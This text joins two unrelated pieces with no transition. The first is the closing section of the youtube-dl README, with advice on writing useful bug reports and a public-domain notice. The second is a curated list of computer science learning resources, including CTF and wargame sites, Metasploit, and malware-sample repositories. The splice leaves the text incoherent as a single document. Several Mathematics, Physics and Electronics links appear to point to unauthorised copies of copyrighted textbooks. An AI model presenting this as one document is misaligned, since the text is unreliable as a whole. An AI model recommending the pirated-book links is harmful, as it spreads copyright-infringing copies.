### Is the description of the issue itself sufficient?
We often get issue reports that we cannot really decipher. While in most cases we eventually get the required information after asking back multiple times, this poses an unnecessary drain on our resources. Many contributors, including myself, are also not native speakers, so we may misread some parts.
So please elaborate on what feature you are requesting, or what bug you want to be fixed. Make sure that it's obvious
- What the problem is
- How it could be fixed
- How your proposed solution would look like
If your report is shorter than two lines, it is almost certainly missing some of these, which makes it hard for us to respond to it. We're often too polite to close the issue outright, but the missing info makes misinterpretation likely. As a committer myself, I often get frustrated by these issues, since the only possible way for me to move forward on them is to ask for clarification over and over.
For bug reports, this means that your report should contain the *complete* output of youtube-dl when called with the `-v` flag. The error message you get for (most) bugs even says so, but you would not believe how many of our bug reports do not contain this information.
If your server has multiple IPs or you suspect censorship, adding `--call-home` may be a good idea to get more diagnostics. If the error is `ERROR: Unable to extract ...` and you cannot reproduce it from multiple countries, add `--dump-pages` (warning: this will yield a rather large output, redirect it to the file `log.txt` by adding `>log.txt 2>&1` to your command-line) or upload the `.dump` files you get when you add `--write-pages` [somewhere](https://gist.github.com/).
**Site support requests must contain an example URL**. An example URL is a URL you might want to download, like `https://www.youtube.com/watch?v=BaW_jenozKc`. There should be an obvious video present. Except under very special circumstances, the main page of a video service (e.g. `https://www.youtube.com/`) is *not* an example URL.
### Are you using the latest version?
Before reporting any issue, type `youtube-dl -U`. This should report that you're up-to-date. About 20% of the reports we receive are already fixed, but people are using outdated versions. This goes for feature requests as well.
### Is the issue already documented?
Make sure that someone has not already opened the issue you're trying to open. Search at the top of the window or browse the [GitHub Issues](https://github.com/rg3/youtube-dl/search?type=Issues) of this repository. If there is an issue, feel free to write something along the lines of "This affects me as well, with version 2015.01.01. Here is some more information on the issue: ...". While some issues may be old, a new post into them often spurs rapid activity.
### Why are existing options not enough?
Before requesting a new feature, please have a quick peek at [the list of supported options](https://github.com/rg3/youtube-dl/blob/master/README.md#options). Many feature requests are for features that actually exist already! Please, absolutely do show off your work in the issue report and detail how the existing similar options do *not* solve your problem.
### Is there enough context in your bug report?
People want to solve problems, and often think they do us a favor by breaking down their larger problems (e.g. wanting to skip already downloaded files) to a specific request (e.g. requesting us to look whether the file exists before downloading the info page). However, what often happens is that they break down the problem into two steps: One simple, and one impossible (or extremely complicated one).
We are then presented with a very complicated request when the original problem could be solved far easier, e.g. by recording the downloaded video IDs in a separate file. To avoid this, you must include the greater context where it is non-obvious. In particular, every feature request that does not consist of adding support for a new site should contain a use case scenario that explains in what situation the missing feature would be useful.
### Does the issue involve one problem, and one problem only?
Some of our users seem to think there is a limit of issues they can or should open. There is no limit of issues they can or should open. While it may seem appealing to be able to dump all your issues into one ticket, that means that someone who solves one of your issues cannot mark the issue as closed. Typically, reporting a bunch of issues leads to the ticket lingering since nobody wants to attack that behemoth, until someone mercifully splits the issue into multiple ones.
In particular, every site support request issue should only pertain to services at one site (generally under a common domain, but always using the same backend technology). Do not request support for vimeo user videos, White house podcasts, and Google Plus pages in the same issue. Also, make sure that you don't post bug reports alongside feature requests. As a rule of thumb, a feature request does not include outputs of youtube-dl that are not immediately related to the feature at hand. Do not post reports of a network error alongside the request for a new video service.
### Is anyone going to need the feature?
Only post features that you (or an incapacitated friend you can personally talk to) require. Do not post features because they seem like a good idea. If they are really useful, they will be requested by someone who requires them.
### Is your question about youtube-dl?
It may sound strange, but some bug reports we receive are completely unrelated to youtube-dl and relate to a different, or even the reporter's own, application. Please make sure that you are actually using youtube-dl. If you are using a UI for youtube-dl, report the bug to the maintainer of the actual application providing the UI. On the other hand, if your UI for youtube-dl fails in some way you believe is related to youtube-dl, by all means, go ahead and report the bug.
# COPYRIGHT
youtube-dl is released into the public domain by the copyright holders.
This README file was originally written by [Daniel Bolton](https://github.com/dbbolton) and is likewise released into the public domain.
|
[![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/sindresorhus/awesome)
> A curated list of awesome academic and practical resources for Computer Science students.
- [Contribution guide](CONTRIB.md)
## Table of Contents
- [General CS](#general-cs)
- [Learning Platforms](#learning-platforms)
- [Algorithms](#algorithms)
- [Languages](#languages)
- [Computer Graphics](#computer-graphics)
- [Encryption & Hashing](#encryption-and-hashing)
- [Networks](#networks)
- [Compilers](#compilers)
- [Machine Learning](#machine-learning)
- [YouTube](#youtube)
- [Podcasts](#podcasts)
- [Mathematics](#mathematics)
- [Physics](#physics)
- [Digital Electronics](#digital-electronics)
- [Games & Contests](#games-and-contests)
- [Malware Analysis](#malware-analysis)
- [Miscellaneous](#miscellaneous)
## General CS
- [Computer Science Books (Shodan)](https://shodan.me/books/)
- [Free Programming Books (VHF Repo)](https://github.com/vhf/free-programming-books/blob/master/free-programming-books.md)
- [Computer Science (Open Source Society)](https://github.com/open-source-society/computer-science)
- [621+ Programming Resources](https://medium.com/free-stuff/2000-programming-resources-c2c835001216#.sr0jfcxu4)
- [30 Free Programming eBooks](http://citizen428.net/blog/2010/08/12/30-free-programming-ebooks/)
- [Curated List of Awesome Lists](https://github.com/sindresorhus/awesome/blob/master/readme.md)
- [Shared Tech Resources](https://www.dropbox.com/sh/n01pbk76jy0fbcz/AACbIvq_EPfkHkBph62G4sjFa)
- [Papers We Love](https://github.com/papers-we-love/papers-we-love)
- [Become a Programmer, Motherfucker](http://programming-motherfucker.com/become.html)
- [DevDocs - Multiple Documentations](http://devdocs.io/)
- [Awesome BR](http://awesome-br.com/#/)
- [Build a Modern Computer from First Principles](https://www.coursera.org/learn/build-a-computer)
- Today I Learned (TIL)
- [jbranchaud/til](https://github.com/jbranchaud/til)
- [thoughtbot/til](https://github.com/thoughtbot/til)
- [jwworth/til](https://github.com/jwworth/til)
- [Hashrocket](https://til.hashrocket.com/)
- [Complexity Zoo](https://complexityzoo.uwaterloo.ca/Complexity_Zoo)
- [Big O Complexity Cheat Sheet](http://bigocheatsheet.com/)
- [Computer Science from the Bottom Up](http://www.bottomupcs.com/)
- [Computer Science Field Guide](http://www.cosc.canterbury.ac.nz/csfieldguide/dev/dev/index.html)
- [Translating Mathematics into Code](http://matt.might.net/articles/discrete-math-and-code/)
- [Learn Enough to Be Dangerous](http://www.learnenough.com/)
- [Programming Languages Paradigms](http://www.cyan-lang.org/jose/courses/14-1/PLP/lpa.pdf)
- [Dictionary of Algorithms and Data Structures](https://xlinux.nist.gov/dads/)
- [SyntaxDB](https://syntaxdb.com/)
- [ExplainShell](http://explainshell.com/)
- [CS50](https://cs50.harvard.edu/)
## Learning Platforms
- Code
- [Code.org](https://www.code.org/)
- [Codeacademy](http://www.codecademy.com/)
- [Codeavengers](http://www.codeavengers.com/)
- [Codeschool](https://www.codeschool.com/)
- [Treehouse](http://teamtreehouse.com/)
- [CodeHS](https://codehs.com/)
- [CodingBat](http://codingbat.com/)
- [FreeCodeCamp](http://www.freecodecamp.com/)
- [Coursera CS](https://pt.coursera.org/browse/computer-science?languages=pt)
- [KhanAcademy CS](https://pt.khanacademy.org/computing/computer-science)
- [EdX CS](https://www.edx.org/course/subject/computer-science)
- [Udemy Development (Free)](https://www.udemy.com/courses/development/all-courses/?price=price-free&lang=en)
- [Udemy IT & Software (Free)](https://www.udemy.com/courses/it-and-software/all-courses/?price=price-free&lang=en)
- [Stanford Courses](http://online.stanford.edu/courses/allcourses)
- [Cybrary.IT](https://www.cybrary.it/)
- [Computer Science and Electrical Engineering (MIT)](http://ocw.mit.edu/courses/#electrical-engineering-and-computer-science)
- [Computer Science and Electrical Engineering (Audio & Video, MIT)](http://ocw.mit.edu/courses/audio-video-courses/#electrical-engineering-and-computer-science)
## Algorithms
- Material recomendado
- [Introduction to Algorithms - Thomas Cormen](http://is.ptithcm.edu.vn/~tdhuy/Programming/Introduction.to.Algorithms.pdf)
- [Estruturas de Dados - Waldemar Celes e Jose Lucas Rangel](https://drive.google.com/open?id=0BwV_da1xnClATW80bktjZkIxeW8)
- [Projetos de Algoritmos Com Implementações em Pascal e C - Nívio Ziviani](https://drive.google.com/open?id=0BwV_da1xnClAU1JpeExOS29XdmM)
## Languages
## C & C++
- [Learn C The Hard Way](http://c.learncodethehardway.org/book/)
- [C Progressivo](http://www.cprogressivo.net/)
- [C Completo e Total](http://www.inf.ufpr.br/lesoliveira/download/c-completo-total.pdf)
- [Linguagem C](http://www.lrc.ic.unicamp.br/~takeo/mc102_1s2016/LINGUAGEM_C.pdf)
- [Learn C](http://www.learn-c.org/)
- [C++ Complete Reference](http://goo.gl/Le6gUi)
- [Learn C++](http://www.learncpp.com/)
- [Geeks4Geeks C](http://www.geeksforgeeks.org/c/)
- [Teach Yourself C in 24 Hours](http://aelinik.free.fr/c/)
- [Stanford CS Education Library](http://cslibrary.stanford.edu/)
- [C Gibberish ↔ English](http://www.cdecl.org/)
- [Clockwise/Spiral Rule](http://c-faq.com/decl/spiral.anderson.html)
- [OOC](http://www.planetpdf.com/codecuts/pdfs/ooc.pdf)
- [UNIX System Calls and Subroutines using C](http://www.cs.cf.ac.uk/Dave/C/)
- [IAR Advanced preprocessor tips and tricks](https://www.iar.com/support/resources/articles/advanced-preprocessor-tips-and-tricks/)
- [Organizing Code Files in C and C++](http://www.gamedev.net/page/resources/_/technical/general-programming/organizing-code-files-in-c-and-c-r1798)
## Python
- [Automate The Boring Stuff With Python](https://automatetheboringstuff.com/)
- [The Hitchhiker’s Guide to Python!](http://docs.python-guide.org/en/latest/)
- [Python Programming](http://www.jeffknupp.com/)
- [Open Sourcing a Python Project the Right Way](http://www.jeffknupp.com/blog/2013/08/16/open-sourcing-a-python-project-the-right-way/)
- [The Best Way to Learn Python](http://net.tutsplus.com/tutorials/the-best-way-to-learn-python/)
- [Python Classes and OOP](https://www.jeffknupp.com/blog/2014/06/18/improve-your-python-python-classes-and-object-oriented-programming/)
- [Async/await in Python 3.5](http://www.snarky.ca/how-the-heck-does-async-await-work-in-python-3-5)
- [Por que há tantos Pythons?](http://www.toptal.com/python/por-que-h-tantos-pythons/pt)
- [Python Tutor](http://pythontutor.com/)
- [Anaconda](https://www.continuum.io/anaconda-community)
## Ruby
- [Learn Ruby The Hard Way](http://learnrubythehardway.org/book/)
- [Humble Little Ruby Book](http://humblelittlerubybook.com/book/html/)
- [Poignant Guide to Ruby](http://poignant.guide/book/chapter-1.html)
- [Learn to Program](https://pine.fm/LearnToProgram/)
- [Ruby Koans](http://rubykoans.com/)
- [Awesome Ruby](http://awesome-ruby.com/)
- [Ruby Monk](http://rubymonk.org/)
- [Ruby em Vinte Minutos](https://www.ruby-lang.org/pt/documentation/quickstart/)
- [Try Ruby](http://tryruby.org/levels/1/challenges/0)
- [Writing a compiler in Ruby, bottom up](http://hokstad.com/compiler)
- [Pocket Programming - Ruby/Rails](http://rails.pocket-programming.com/)
## Perl
- [Learn Perl in about 2 hours 30 minutes](http://qntm.org/files/perl/perl.html)
- [Modern Perl](http://onyxneon.com/books/modern_perl/modern_perl_letter.pdf)
- [Impatient Perl](http://www.greglondon.com/iperl/pdf/iperl.pdf)
- [Learning Perl the Hard Way](http://www.greenteapress.com/perl/perl.pdf)
- [Beginning Perl](http://web.archive.org/web/20120709053246/http://ofps.oreilly.com/titles/9781118013847/index.html)
## Java
- [Java Starter](http://t2ti.com/curso/video/java/basico/java_starter.php)
- [Java Design Patterns](https://github.com/iluwatar/java-design-patterns)
## PHP
- [PHP: The Right Way](http://www.phptherightway.com/)
- [PHP Best Practices](https://phpbestpractices.org)
- [PHP Pandas](http://daylerees.com/php-pandas/)
## Javascript
- [Eloquent Javascript](http://eloquentjavascript.net/index.html)
- [You Don't Know JS](https://github.com/getify/You-Dont-Know-JS)
- [The Entire JS Language in One Image](http://d2brer6wwumtdu.cloudfront.net/wp-content/uploads/2015/09/09191550/infographic-the-entire-javascript-language-in-one-single-image-491250-2.jpg)
- [JS: The Right Way](http://jstherightway.org/)
- [JavaScript for Cats](http://jsforcats.com/)
## HTML/CSS
- [Develop & Style Websites](http://learn.shayhowe.com/)
## SQL
- [SQL Completo - Softblue](http://www.softblue.com.br/site/curso/id/3/CURSO+DE+SQL+COMPLETO+BASICO+AO+AVANCADO+ON+LINE+BD03+GRATIS)
- [A Simple Guide to Five Normal Forms in Relational Database Theory](http://www.bkent.net/Doc/simple5.htm)
- [The Codex » Do Not Pass This Way Again](http://grimoire.ca/mysql/choose-something-else)
## R
- [Code School - Try R](http://tryr.codeschool.com/)
- [R Programming Tutorials](http://www.listendata.com/p/r-programming-tutorials.html)
- [R by example](http://www.mayin.org/ajayshah/KB/R/index.html)
- [The R Language](http://stat.ethz.ch/R-manual/R-patched/doc/html/)
- [CRAN: Manuals](http://cran.r-project.org/manuals.html)
- [swirl: Learn R, in R.](http://swirlstats.com/)
## Haskell
- [YBlog - Learn Haskell Fast and Hard](http://yannesposito.com/Scratch/en/blog/Haskell-the-Hard-Way/)
- [Learn You a Haskell for Great Good!](http://learnyouahaskell.com/chapters)
- [Aprender Haskell será um grande bem para você!](http://haskell.tailorfontela.com.br/chapters)
- [How to learn Haskell](https://github.com/bitemyapp/learnhaskell)
- [Real World Haskell](http://book.realworldhaskell.org/read/)
- [Haskell (Wikibooks)](https://en.wikibooks.org/wiki/Haskell)
- [Yet Another Haskell Tutorial](http://www.umiacs.umd.edu/~hal/docs/daume02yaht.pdf)
- [Try Haskell! An interactive tutorial in your browser](http://tryhaskell.org/)
- [HaskellWiki](https://wiki.haskell.org/Example_code)
- [Haskell for all](http://www.haskellforall.com/)
- [Haskell Exercises](https://github.com/commercialhaskell/haskelldocumentation/tree/master/exercises)
- [Write You a Haskell (Stephen Diehl)](http://dev.stephendiehl.com/fun/)
- [What I Wish I Knew When Learning Haskell (Stephen Diehl)](http://dev.stephendiehl.com/hask)
- [Monads for Dummies (Stephan Boyer)](https://www.stephanboyer.com/post/83/monads-for-dummies)
- [The Marvels of Monads](http://blogs.msdn.com/b/wesdyer/archive/2008/01/11/the-marvels-of-monads.aspx)
- [State of the Haskell ecosystem](https://github.com/Gabriel439/post-rfc/blob/master/sotu.md)
- [Hoogle](https://www.haskell.org/hoogle/)
- [Typeclassopedia](https://wiki.haskell.org/Typeclassopedia)
- [An Introduction to Cabal sandboxes](http://coldwa.st/e/blog/2013-08-20-Cabal-sandbox.html)
- [Monad transformers, free monads, mtl, laws and a new approach](https://ocharles.org.uk/blog/posts/2016-01-26-transformers-free-monads-mtl-laws.html)
## OCaml
- [OCaml Tutorials](http://ocaml.org/learn/tutorials/)
## Clojure
- [Try Clojure](http://tryclj.com/)
- [Clojure for the Brave and True](http://www.braveclojure.com/)
- [Clojure from the Ground Up](http://aphyr.com/posts/301-clojure-from-the-ground-up-welcome)
- [Clojure Koans](http://clojurekoans.com/)
- [4Clojure](http://www.4clojure.com/)
- [Clojure Distilled](http://yogthos.github.io/ClojureDistilled.html)
## F#
- [Learning F#](http://fsharp.org/about/learning.html)
- [F# syntax in 60 seconds](http://fsharpforfunandprofit.com/posts/fsharp-in-60-seconds/)
## Julia
- [Learning Julia](http://julialang.org/learning/)
- [Julia Documentation](http://docs.julialang.org/en/release-0.4/)
- [juliabook](https://github.com/chrisvoncsefalvay/juliabook)
## Erlang
- [The Zen of Erlang](http://ferd.ca/the-zen-of-erlang.html)
- [Learn You Some Erlang for Great Good!](http://learnyousomeerlang.com/content)
- [Try Erlang](http://www.tryerlang.org/)
- [Elixir School](https://elixirschool.com/pt/)
## Smalltalk
## Common Lisp
- [Lisp Hackers, Interviews with 100x More Productive Programmers](https://leanpub.com/lisphackers)
- [L(λ)THW, Learn Lisp The Hard Way](http://learnlispthehardway.org/)
- [Paul Graham's On Lisp, Advanced Techniques for Common Lisp](http://www.paulgraham.com/onlisp.html)
- [Lisp in Small Parts](http://lisp.plasticki.com/)
- [Common Lisp Koans](https://github.com/google/lisp-koans)
- [CLiki, Common Lisp Wiki](http://www.cliki.net/)
## Scheme
- [Structure and Interpretation of Computer Programs](https://mitpress.mit.edu/sicp/full-text/book/book-Z-H-1.html)
- [Community Scheme Wiki](http://community.schemewiki.org/)
## Lua
- [Programming in Lua](http://www.lua.org/pil/contents.html)
## Computer Graphics
- [Cg/Unity tutorials](https://en.wikibooks.org/wiki/Cg_Programming/Unity)
- Tools
- [Blender](https://www.blender.org/)
- [L3DT](http://www.bundysoft.com/L3DT/)
- [Unity](https://unity3d.com/)
- Languages
- Cg
- [Cg Documentation](http://http.developer.nvidia.com/Cg/index.html)
- [The Cg Tutorial](http://http.developer.nvidia.com/CgTutorial/cg_tutorial_frontmatter.html)
- Processing
- [Processing Tutorial](https://processing.org/tutorials/)
- [Nature of Code](http://natureofcode.com/book/introduction/)
## Encryption and Hashing
- Repos
- [CyberChef: The Cyber Swiss Army Knife](https://github.com/gchq/CyberChef)
- [Codebreaker](https://github.com/asweigart/codebreaker)
- [Encoding vs Encryption vs Hashing vs Obfuscation](https://danielmiessler.com/study/encoding-encryption-hashing-obfuscation/)
- [GPG/PGP Basics](http://aplawrence.com/Basics/gpg.html)
- [An Introduction to Public Key Cryptography and PGP](https://ssd.eff.org/en/module/introduction-public-key-cryptography-and-pgp)
- [GPG tutorial and PGP Public Key](https://futureboy.us/pgp.html)
- [Lifetimes of cryptographic hash functions](http://valerieaurora.org/hash.html)
- [Handbook of Applied Cryptography](http://cacr.uwaterloo.ca/hac/)
- [Provably Fair Shuffling Through Cryptography](https://techblog.bitzino.com/2012-06-30-provably-fair-shuffling-through-cryptography.html)
## Networks
- [Beej's Guide to Network Programming](http://beej.us/guide/bgnet/output/html/multipage/)
- [Redes de Computadores](https://pt.coursera.org/course/comnetworks)
- [Tráfego | RNP](http://www.rnp.br/servicos/conectividade/trafego)
- [SIMET](http://simet.nic.br/mapas/)
- [PCAPR](http://www.pcapr.net)
- [ISFCE Sample Practical Exercise](http://www.isfce.com/sample-pe.htm)
- [PacketLife Capture Collection](http://packetlife.net/captures/)
- [DigitalCorpora Packet Dumps](http://digitalcorpora.org/corpora/packet-dumps)
- [Evil Fingers PCAP Challenges](https://www.evilfingers.com/repository/pcaps_challenge.php)
- [PCAPS Repository](https://github.com/markofu/pcaps)
- [Chris Sanders Packet Captures](http://chrissanders.org/packet-captures/)
- [Tcpreplay Sample Captures](http://tcpreplay.appneta.com/wiki/captures.html)
- [MAWI Working Group Traffic Archive](http://mawi.wide.ad.jp/mawi/)
- [LBNL-FTP-PKT](http://ee.lbl.gov/anonymized-traces.html/)
## Compilers
- [Grammar: The language of languages](http://matt.might.net/articles/grammars-bnf-ebnf/)
- [How parsers and compilers work](http://parsingintro.sourceforge.net/)
- [LL and LR in Context: Why Parsing Tools Are Hard](http://blog.reverberate.org/2013/09/ll-and-lr-in-context-why-parsing-tools.html)
- [LL and LR Parsing Demystified](http://blog.reverberate.org/2013/07/ll-and-lr-parsing-demystified.html)
- [What Every Programmer Should Know About Compiler Optimizations](https://msdn.microsoft.com/en-us/magazine/dn904673.aspx)
- [Compiler Explorer](http://gcc.godbolt.org/)
- [Compiler Design Tutorial](http://www.tutorialspoint.com/compiler_design/index.htm)
## Machine Learning
- [Awesome Machine Learning](https://github.com/josephmisiti/awesome-machine-learning)
- [Machine Learning Foundations](https://www.coursera.org/learn/ml-foundations/)
- [A Course in Machine Learning](http://ciml.info/)
- [Neural Networks (Sherbrooke)](https://www.youtube.com/playlist?list=PL6Xpj9I5qXYEcOhn7TqghAJ6NAPrNmUBH)
- [Machine Learning Video Library](http://work.caltech.edu/library/)
- [Machine Learning Mastery](http://machinelearningmastery.com/start-here/)
- [Machine Learning Course (Caltech)](https://www.youtube.com/playlist?list=PLD63A284B7615313A)
- [Deep Learning Courses (NVIDIA)](https://developer.nvidia.com/deep-learning-courses)
- [Deep Learning, Feature Learning](https://www.youtube.com/playlist?list=PLHyI3Fbmv0SdzMHAy0aN59oYnLy5vyyTA)
- [A blog about Machine Learning, Deep Learning and NLP.](http://www.wildml.com/)
- [A Tour of Machine Learning Algorithms](http://machinelearningmastery.com/a-tour-of-machine-learning-algorithms/)
- [Machine learning is way easier than it looks](http://blog.intercom.io/machine-learning-way-easier-than-it-looks/)
- [A Visual Introduction to Machine Learning](http://www.r2d3.us/visual-intro-to-machine-learning-part-1/)
- [Neural Networks and Deep Learning](http://neuralnetworksanddeeplearning.com/)
- [Deep Learning Glossary](http://www.wildml.com/deep-learning-glossary/)
- [Understanding Convolution in Deep Learning](http://timdettmers.com/2015/03/26/convolution-deep-learning/)
- [Deep Learning (Nando de Freitas, Oxford)](https://www.youtube.com/watch?v=PlhFWT7vAEw&list=PLE6Wd9FR--EfW8dtjAuPoTuPcqmOV53Fu&index=16)
- [Undergrad Machine Learning (Nando de Freitas)](https://www.youtube.com/playlist?list=PLE6Wd9FR--Ecf_5nCbnSQMHqORpiChfJf)
- [Machine Learning (Nando de Freitas)](https://www.youtube.com/watch?v=w2OtwL5T1ow&list=PLE6Wd9FR--EdyJ5lbFl8UuGjecvVw66F6)
- [Top 10 Data Mining Algorithms in Plain English](http://rayli.net/blog/data/top-10-data-mining-algorithms-in-plain-english/)
- [TensorFlow Tutorials](https://github.com/pkmital/tensorflow_tutorials)
- [CS231n Convolutional Neural Networks for Visual Recognition](http://cs231n.github.io/neural-networks-1/)
## YouTube
- [Computerphile](https://www.youtube.com/user/Computerphile)
- [Numberphile](https://www.youtube.com/user/numberphile)
- [Strange Loop](https://www.youtube.com/channel/UC_QIfHvN9auy2CoOdSfMWDw)
- [Matemática Rio](https://www.youtube.com/user/matematicario)
- [Art of the Problem](https://www.youtube.com/user/ArtOfTheProblem)
## Podcasts
- [DEV na ESTRADA](http://devnaestrada.com.br/) (Portuguese)
- [PODebug](http://www.podebug.com/) (Portuguese)
- [Grok Podcast](http://www.grokpodcast.com/) (Portuguese)
- [Castálio Podcast](http://castalio.info/) (Portuguese)
- [Hack N' Cast](http://hackncast.org/) (Portuguese)
- [Giant Robots Smashing into Other Giant Robots](http://giantrobots.fm/) (English)
- [Ruby Rogues](https://devchat.tv/ruby-rogues) (English)
- [The Elixir Fountain](https://soundcloud.com/elixirfountain) (English)
- [The Changelog](https://changelog.com/podcast/) (English)
- [Developer Tea](http://developertea.com/) (English)
- [Hanselminutes](http://hanselminutes.com/) (English)
- [Turing-Incomplete](https://turing.cool) (English)
- [The Bike Shed](http://bikeshed.fm/) (English)
- [Code Newbie](http://www.codenewbie.org/podcast) (English)
- [Developer On Fire](http://developeronfire.com/) (English)
- [Mostly Erlang](http://mostlyerlang.com/) (English)
- [Functional Geekery](https://www.functionalgeekery.com/category/podcasts/) (English)
- [The Type Theory Podcast](http://typetheorypodcast.com/) (English)
- [The Haskell Cast](http://www.haskellcast.com/) (English)
## Mathematics
- Tools
- [WolframAlpha](http://www.wolframalpha.com/)
- [GeoGebra](http://www.geogebra.org/)
- [Symbolab Math Solver](https://www.symbolab.com/)
- [MS Mathematics](https://www.microsoft.com/en-us/download/details.aspx?id=15702)
- [Slader (Textbook Solutions)](https://www.slader.com)
- [BetterExplained](http://betterexplained.com/articles/category/math/)
- [PatrickJMT](http://patrickjmt.com/)
- [Cálculo I - USP](http://eaulas.usp.br/portal/course.action?course=2600)
- Material Recomendado
- [Cálculo I - Sacha Friedli](http://www.mat.ufmg.br/~sacha/textos/Calculo/Apostila_2015_02_26.pdf)
- [Cálculo Vol. 1 - James Stewart](https://mega.nz/#!m8RUgS4S!lwskupcv1jnVKfhqJWl5rD7hgkZj54rgw6-qN6xzUyg)
- [Cálculo Vol. 2 - James Stewart](https://mega.nz/#!RctFjCyI!tUYuEWKQkowKVtAw5ivp5yCTdYAnBnSNUKkS0ah_l0Q)
- [Um Curso de G.A.A.L. - R. J.](https://www.dropbox.com/s/jj3xq0hjv2z39zp/gaalt0.pdf?)
- [Discrete Mathematics and its Applications](http://www2.fiit.stuba.sk/~kvasnicka/Mathematics%20for%20Informatics/Rosen_Discrete_Mathematics_and_Its_Applications_7th_Edition.pdf)
- [Apostilas - Reginaldo](http://www.mat.ufmg.br/~regi/apostilas.html)
- [Listas - Takahashi](http://www.mat.ufmg.br/~taka/Pagina-CalcI/Pagina-CalcI.htm)
- [G.A.A.L. - Uma Visão Geométrica](http://www.mat.ufmg.br/ead/acervo/livros/Geometria%20Analitica%20e%20Algebra%20Linear%20-%20Uma%20Visao%20Geometrica%20-%20TI.pdf)
- [Curso de Cálculo I - Sacha](https://www.youtube.com/watch?v=KyVYNbwfjtU&list=PLOiKHlNoCwd2s7rq1P4fGQ0iqf-eWi0Wo)
- [Pequenos Erros que Causam Grandes Dificuldades](http://www.mat.ufmg.br/~taka/Pagina-CalcI/ManualDuvidas.pdf)
- [Elementary Number Theory and Its Applications](http://www.fmf.uni-lj.si/~lavric/Rosen%20-%20Elementary%20number%20theory%20and%20its%20applications.pdf)
- [A First Course in Probability](http://zalsiary.kau.edu.sa/Files/0009120/Files/119387_A_First_Course_in_Probability_8th_Edition.pdf)
- [Introduction to Matrix Computation](https://drive.google.com/file/d/0BwEtMaYZ7WapRkNodTgycVJLSTg/view)
- [Algoritmos Numéricos](https://drive.google.com/file/d/0BwEtMaYZ7WapU05yTmItVTVyNms/view)
- [Curso de Cálculo de uma Variável](http://www.dma.im.ufrj.br/~mcabral/textos/cursoCalculoI-livro-a4-V2-2.pdf)
- [Mathematics (MIT)](http://ocw.mit.edu/courses/mathematics/)
- [Multivariable Calculus (Whitman)](https://www.whitman.edu/mathematics/multivariable/multivariable.pdf)
- [Differential & Integral Calculus (UCLA)](https://www.youtube.com/playlist?list=PL1BE3027EF549C7D1)
- [Probability (UCLA)](https://www.youtube.com/playlist?list=PL5BE09709EECF36AA)
- [A First Course in Probability (Sheldon Ross)](http://zalsiary.kau.edu.sa/Files/0009120/Files/119387_A_First_Course_in_Probability_8th_Edition.pdf)
- [Anotações Matemáticas (Renji Rodrigo)](https://bmpa.wordpress.com/2012/04/29/minhas-anotacoes/)
## Physics
- Material Recomendado
- [Física Experimental - Lab1](http://www.fisica.ufmg.br/~lab1/)
- [Física Experimental Básica na Universidade](https://www.passeidireto.com/arquivo/975892/fisica-experimental-basica-na-universidade-)
- [Física Básica: Mecânica (1ª edição)](http://www22.zippyshare.com/v/n42cjIKo/file.html)
- [Feynman Lectures (Caltech)](http://www.feynmanlectures.caltech.edu/)
- [Physics (MIT)](http://ocw.mit.edu/courses/physics/)
## Digital Electronics
- Material Recomendado
- [Contemporary Logic Design (2nd Edition) - Randy H. Katz, Gaetano Borriello](http://www51.zippyshare.com/v/VQZDji9q/file.html)
## Games & Contests
- Programming
- [CodeForces](http://codeforces.com/?locale=en)
- [CodePit](https://www.codepit.io/)
- [Code Fights](https://codefights.com/)
- [HackerRank](https://www.hackerrank.com/)
- [Programmr](http://www.programmr.com/)
- [Project Euler](https://projecteuler.net/archives)
- [URI Online Judge](https://www.urionlinejudge.com.br/)
- [UVA Online Judge](https://uva.onlinejudge.org/)
- [SPOJ Brasil](http://br.spoj.com/)
- [SPOJ International](http://www.spoj.com/)
- [Exercism.IO](http://exercism.io/)
- [Scratch](https://scratch.mit.edu/)
- Infosec
- Repos
- [ctfs](https://github.com/ctfs/)
- [pwntools](https://github.com/Gallopsled/pwntools)
- [ctftools](https://github.com/zardus/ctf-tools)
- [metasploit](https://github.com/rapid7/metasploit-framework)
- [CTFTime](https://ctftime.org/)
- [WeChall](http://www.wechall.net/)
- [Pwnable.KR](http://pwnable.kr/play.php)
- [Reversing.KR](http://reversing.kr/)
- [Smash The Stack](http://www.smashthestack.org/)
- [Shellterlabs](https://shellterlabs.com/pt-br/)
- [SucuriHC](http://ctf.sucurihc.org/)
- [Root-me](https://www.root-me.org/en/Capture-The-Flag/)
- [PicoCTF](https://picoctf.com)
- [RingZer0 CTF](https://ringzer0team.com/)
- [HackTheBox](https://www.hackthebox.eu/en)
- [Wargame-100security](http://www.100security.com.br/wargame/)
- [Hack Yeaster](http://hackyeaster.hacking-lab.com)
- [SCTF](https://sctf.io/)
- [EnigmaGroup](http://www.enigmagroup.org/)
- [Exploit Exercises](http://exploit-exercises.com/)
- [Google Gruyere](http://google-gruyere.appspot.com/)
- [Gh0st Lab](http://www.gh0st.net/)
- [Hack This Site](http://www.hackthissite.org/)
- [HackThis](http://www.hackthis.co.uk/)
- [HackQuest](http://www.hackquest.com/)
- [Hack.me](https://hack.me)
- [Hacking-Lab](https://www.hacking-lab.com)
- [Hacker Challenge](http://www.dareyourmind.net/)
- [Hacker Test](http://www.hackertest.net/)
- [hACME Game](http://www.hacmegame.org/)
- [Hax.Tor](http://hax.tor.hu/)
- [OverTheWire](http://www.overthewire.org/wargames/)
- [pwn0](https://pwn0.com/home.php)
- [RootContest](http://rootcontest.com/)
- [Root Me](http://www.root-me.org/?lang=en)
- [Security Treasure Hunt](http://www.securitytreasurehunt.com/)
- [TheBlackSheep and Erik](http://www.bright-shadows.net/)
- [ThisIsLegal](http://thisislegal.com/)
- [Try2Hack](http://www.try2hack.nl/)
- [WabLab](http://www.wablab.com/hackme)
- [XSS: Can You XSS This?](http://canyouxssthis.com/HTMLSanitizer/)
- [XSS: ProgPHP](http://xss.progphp.com/)
- [Network Forensics Puzzle contest](http://forensicscontest.com/puzzles)
- [DEF CON CTF Archive](https://www.defcon.org/html/links/dc-ctf.html)
- [DigitalCorpora](http://digitalcorpora.org/)
- [Honeynet Challenges](https://www.honeynet.org/challenges)
- [I Smell Packets](http://ismellpackets.com/)
- [DFRWS 2014 Forensics Rodeo](http://www.cs.uno.edu/~golden/dfrws-2014-rodeo.html)
- [Linux LEO Supplemental Files](http://linuxleo.com/)
## Malware Analysis
- [Open Malware / Offensive Computing](http://openmalware.org/)
- [Contagio](http://contagiodump.blogspot.com/)
- [VX Heaven](http://vxheaven.org/)
- [VirusShare.com / VXShare](http://virusshare.com/)
- [VXVault](http://vxvault.siri-urz.net)
- [MalShare](http://malshare.com/)
